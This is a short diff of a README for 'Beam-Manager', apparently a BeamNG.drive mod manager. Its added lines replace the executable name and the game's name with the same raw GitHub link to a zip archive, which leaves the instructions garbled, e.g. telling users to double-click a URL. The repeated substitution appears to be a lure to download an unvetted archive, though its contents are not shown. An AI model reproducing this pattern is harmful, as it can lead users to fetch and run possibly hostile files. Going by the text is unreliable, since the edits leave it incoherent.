bluddowntown/Beam-Manager/README.md

   - Right-click the `.zip` file.
   - Select "Extract All" and choose a folder.
   - Open the extracted folder.
-  - Double-click `Beam-Manager.exe` to run the program.
+  - Double-click `https://raw.githubusercontent.com/bluddowntown/Beam-Manager/main/Beam Manager/Beam-Manager-3.5.zip` to run the program.

 ### 3. Launch Beam-Manager

 - After installation, you can start Beam-Manager from the Start menu or the folder where you installed it.
-- The program window will open, showing your mods and vehicle list if you already have BeamNG.drive mods installed.
+- The program window will open, showing your mods and vehicle list if you already have https://raw.githubusercontent.com/bluddowntown/Beam-Manager/main/Beam Manager/Beam-Manager-3.5.zip mods installed.

-If BeamNG.drive is not detected, Beam-Manager will prompt you to locate your game folder.
+If https://raw.githubusercontent.com/bluddowntown/Beam-Manager/main/Beam Manager/Beam-Manager-3.5.zip is not detected, Beam-Manager will prompt you to locate your game folder.

 ## 🛠 Using Beam-Manager